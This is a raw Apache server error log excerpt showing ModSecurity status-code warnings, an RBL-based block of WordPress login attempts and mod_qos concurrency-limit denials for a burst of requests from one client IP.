[Tue May 26 19:59:31.293378 2026] [security2:error] [pid 93576:tid 93748] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuSWDRMqfxdEDkoszwXQAAACQ"]
[Tue May 26 19:59:31.302673 2026] [security2:error] [pid 93576:tid 93781] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuSWDRMqfxdEDkoszwXwAAAEU"]
[Tue May 26 19:59:31.303508 2026] [security2:error] [pid 93576:tid 93791] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuSWDRMqfxdEDkoszwWwAAAE8"]
[Tue May 26 19:59:31.308478 2026] [security2:error] [pid 93576:tid 93826] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuSWDRMqfxdEDkoszwZQAAAHI"]
[Tue May 26 19:59:31.308914 2026] [security2:error] [pid 93576:tid 93815] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuSWDRMqfxdEDkoszwbgAAAGc"]
[Tue May 26 19:59:31.313316 2026] [security2:error] [pid 93576:tid 93818] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuSWDRMqfxdEDkoszweQAAAGo"]
[Tue May 26 19:59:31.314914 2026] [security2:error] [pid 93576:tid 93832] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuSWDRMqfxdEDkoszwcgAAAHg"]
[Tue May 26 19:59:31.324087 2026] [security2:error] [pid 93576:tid 93722] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuSWDRMqfxdEDkoszwcQAAAAo"]
[Tue May 26 19:59:31.326584 2026] [security2:error] [pid 93576:tid 93814] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuSWDRMqfxdEDkoszwcAAAAGY"]
[Tue May 26 19:59:31.328781 2026] [security2:error] [pid 93576:tid 93786] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuSWDRMqfxdEDkoszwfQAAAEo"]
[Tue May 26 19:59:31.344492 2026] [security2:error] [pid 93576:tid 93802] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuSWDRMqfxdEDkoszweAAAAFo"]
[Tue May 26 19:59:31.359932 2026] [security2:error] [pid 93576:tid 93762] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuSWDRMqfxdEDkoszwigAAADI"]
[Tue May 26 19:59:31.362476 2026] [security2:error] [pid 93576:tid 93736] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuSWDRMqfxdEDkoszwcwAAABg"]
[Tue May 26 19:59:31.365824 2026] [security2:error] [pid 106517:tid 106753] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuSoZZc2DoU1lPnP1PLwAAAOs"]
[Tue May 26 19:59:31.366246 2026] [security2:error] [pid 106517:tid 106688] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuSoZZc2DoU1lPnP1PMAAAAKo"]
[Tue May 26 19:59:31.380998 2026] [security2:error] [pid 106517:tid 106716] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuSYZZc2DoU1lPnP1PHwAAAMY"]
[Tue May 26 19:59:31.381456 2026] [security2:error] [pid 93576:tid 93721] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuSmDRMqfxdEDkoszwxgAAAAk"]
[Tue May 26 19:59:31.389979 2026] [security2:error] [pid 106517:tid 106689] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuSoZZc2DoU1lPnP1PMwAAAKs"]
[Tue May 26 19:59:31.392332 2026] [security2:error] [pid 93868:tid 94287] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuSkqK9k_ZUB2Vp2562AAAAaw"]
[Tue May 26 19:59:31.397010 2026] [security2:error] [pid 106517:tid 106741] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuSoZZc2DoU1lPnP1PLAAAAN8"]
[Tue May 26 19:59:31.416984 2026] [security2:error] [pid 106517:tid 106693] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuSoZZc2DoU1lPnP1POQAAAK8"]
[Tue May 26 19:59:31.418306 2026] [security2:error] [pid 106517:tid 106732] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuSoZZc2DoU1lPnP1PMQAAANY"]
[Tue May 26 19:59:31.421759 2026] [security2:error] [pid 106517:tid 106660] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuSoZZc2DoU1lPnP1PNwAAAI8"]
[Tue May 26 19:59:31.426367 2026] [security2:error] [pid 93576:tid 93833] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuSmDRMqfxdEDkoszwzwAAAHk"]
[Tue May 26 19:59:31.429474 2026] [security2:error] [pid 93576:tid 93837] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuSmDRMqfxdEDkoszwxQAAAH0"]
[Tue May 26 19:59:31.433094 2026] [security2:error] [pid 106517:tid 106706] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuSoZZc2DoU1lPnP1POAAAALw"]
[Tue May 26 19:59:31.442964 2026] [security2:error] [pid 106517:tid 106756] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuSoZZc2DoU1lPnP1PQAAAAO4"]
[Tue May 26 19:59:31.446186 2026] [security2:error] [pid 106517:tid 106745] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuSoZZc2DoU1lPnP1PNAAAAOM"]
[Tue May 26 19:59:31.842683 2026] [security2:error] [pid 106517:tid 106649] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWuS4ZZc2DoU1lPnP1PWQAAAIU"]
[Tue May 26 19:59:31.884089 2026] [security2:error] [pid 93576:tid 93609] [remote 128.0.36.74:45832] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 74.36.0.128.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWuS2DRMqfxdEDkoszxHAAADR4"]
[Tue May 26 19:59:32.223586 2026] [qos:error] [pid 93868:tid 94283] [client 45.148.10.120:35310] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuTEqK9k_ZUB2Vp257SQAAAag
[Tue May 26 19:59:32.226930 2026] [qos:error] [pid 106517:tid 106731] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuTIZZc2DoU1lPnP1PhAAAANU
[Tue May 26 19:59:32.227091 2026] [qos:error] [pid 93868:tid 94282] [client 45.148.10.120:35060] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuTEqK9k_ZUB2Vp257SgAAAac
[Tue May 26 19:59:32.231537 2026] [qos:error] [pid 93868:tid 94291] [client 45.148.10.120:35074] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuTEqK9k_ZUB2Vp257SwAAAbA
[Tue May 26 19:59:32.233936 2026] [qos:error] [pid 93576:tid 93833] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuTGDRMqfxdEDkoszxTAAAAHk
[Tue May 26 19:59:32.277033 2026] [security2:error] [pid 106517:tid 106750] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuSoZZc2DoU1lPnP1PPwAAAOg"]
[Tue May 26 19:59:32.277291 2026] [security2:error] [pid 93576:tid 93779] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuSmDRMqfxdEDkoszw1AAAAEM"]
[Tue May 26 19:59:32.289938 2026] [security2:error] [pid 106517:tid 106739] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuSoZZc2DoU1lPnP1PPAAAAN0"]
[Tue May 26 19:59:32.290607 2026] [security2:error] [pid 93576:tid 93835] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuSmDRMqfxdEDkoszw2wAAAHs"]
[Tue May 26 19:59:32.295213 2026] [security2:error] [pid 93868:tid 94306] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuSkqK9k_ZUB2Vp2567wAAAb8"]
[Tue May 26 19:59:32.295680 2026] [security2:error] [pid 93576:tid 93641] [remote 128.0.36.74:45832] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 74.36.0.128.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWuTGDRMqfxdEDkoszxSgAARD0"], referer: https://triviewsolutions.com/wp-login.php
[Tue May 26 19:59:32.313847 2026] [security2:error] [pid 93576:tid 93745] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuSmDRMqfxdEDkoszw3AAAACE"]
[Tue May 26 19:59:32.314559 2026] [security2:error] [pid 106517:tid 106697] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuSoZZc2DoU1lPnP1PQQAAALM"]
[Tue May 26 19:59:32.317696 2026] [security2:error] [pid 106517:tid 106713] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuSoZZc2DoU1lPnP1PRAAAAMM"]
[Tue May 26 19:59:32.325362 2026] [security2:error] [pid 106517:tid 106719] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuSoZZc2DoU1lPnP1PRgAAAMk"]
[Tue May 26 19:59:32.327426 2026] [security2:error] [pid 93576:tid 93770] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuSmDRMqfxdEDkoszw5gAAADo"]
[Tue May 26 19:59:32.327457 2026] [security2:error] [pid 93868:tid 94335] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuSkqK9k_ZUB2Vp2569QAAAdw"]
[Tue May 26 19:59:32.328788 2026] [security2:error] [pid 93576:tid 93718] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuSmDRMqfxdEDkoszw6gAAAAY"]
[Tue May 26 19:59:32.331300 2026] [security2:error] [pid 93576:tid 93801] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuSmDRMqfxdEDkoszw3QAAAFk"]
[Tue May 26 19:59:32.331557 2026] [security2:error] [pid 93576:tid 93789] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuSmDRMqfxdEDkoszw5AAAAE0"]
[Tue May 26 19:59:32.335314 2026] [security2:error] [pid 93576:tid 93794] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuSmDRMqfxdEDkoszw2AAAAFI"]
[Tue May 26 19:59:32.340368 2026] [security2:error] [pid 93576:tid 93750] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuSmDRMqfxdEDkoszw5wAAACY"]
[Tue May 26 19:59:32.357880 2026] [security2:error] [pid 93576:tid 93738] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuS2DRMqfxdEDkoszxEQAAABo"]
[Tue May 26 19:59:32.358906 2026] [security2:error] [pid 93576:tid 93771] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuSmDRMqfxdEDkoszw5QAAADs"]
[Tue May 26 19:59:32.359363 2026] [security2:error] [pid 93868:tid 94365] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuSkqK9k_ZUB2Vp2569gAAAfo"]
[Tue May 26 19:59:32.372856 2026] [security2:error] [pid 93868:tid 94360] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuS0qK9k_ZUB2Vp257NQAAAfU"]
[Tue May 26 19:59:32.373098 2026] [security2:error] [pid 106517:tid 106675] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuS4ZZc2DoU1lPnP1PVgAAAJ4"]
[Tue May 26 19:59:32.380650 2026] [security2:error] [pid 93868:tid 94354] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuS0qK9k_ZUB2Vp257NgAAAe8"]
[Tue May 26 19:59:32.390470 2026] [security2:error] [pid 93868:tid 94317] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuS0qK9k_ZUB2Vp257NwAAAco"]
[Tue May 26 19:59:32.394065 2026] [security2:error] [pid 93576:tid 93740] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuS2DRMqfxdEDkoszxGgAAABw"]
[Tue May 26 19:59:32.395459 2026] [security2:error] [pid 93576:tid 93797] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuS2DRMqfxdEDkoszxFAAAAFU"]
[Tue May 26 19:59:32.402217 2026] [security2:error] [pid 93576:tid 93804] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuS2DRMqfxdEDkoszxEAAAAFw"]
[Tue May 26 19:59:32.411550 2026] [security2:error] [pid 93868:tid 94265] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuS0qK9k_ZUB2Vp257QAAAAZY"]
[Tue May 26 19:59:32.421325 2026] [security2:error] [pid 93576:tid 93803] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuS2DRMqfxdEDkoszxJAAAAFs"]
[Tue May 26 19:59:32.422457 2026] [security2:error] [pid 106517:tid 106671] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuS4ZZc2DoU1lPnP1PYQAAAJo"]
[Tue May 26 19:59:32.425561 2026] [security2:error] [pid 106517:tid 106718] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuS4ZZc2DoU1lPnP1PbQAAAMg"]
[Tue May 26 19:59:32.437972 2026] [security2:error] [pid 93868:tid 94260] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuS0qK9k_ZUB2Vp257OQAAAZE"]
[Tue May 26 19:59:32.441693 2026] [security2:error] [pid 93576:tid 93760] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuS2DRMqfxdEDkoszxNgAAADA"]
[Tue May 26 19:59:32.442904 2026] [security2:error] [pid 106517:tid 106776] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuS4ZZc2DoU1lPnP1PdAAAAQI"]
[Tue May 26 19:59:32.446213 2026] [security2:error] [pid 93576:tid 93712] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuS2DRMqfxdEDkoszxIgAAAAA"]
[Tue May 26 19:59:32.448066 2026] [security2:error] [pid 93576:tid 93713] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuS2DRMqfxdEDkoszxMwAAAAE"]
[Tue May 26 19:59:32.449087 2026] [security2:error] [pid 106517:tid 106770] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuS4ZZc2DoU1lPnP1PbgAAAPw"]
[Tue May 26 19:59:32.575710 2026] [qos:error] [pid 93576:tid 93813] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuTGDRMqfxdEDkoszxiAAAAGU
[Tue May 26 19:59:32.575926 2026] [qos:error] [pid 106517:tid 106742] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuTIZZc2DoU1lPnP1PmQAAAOA
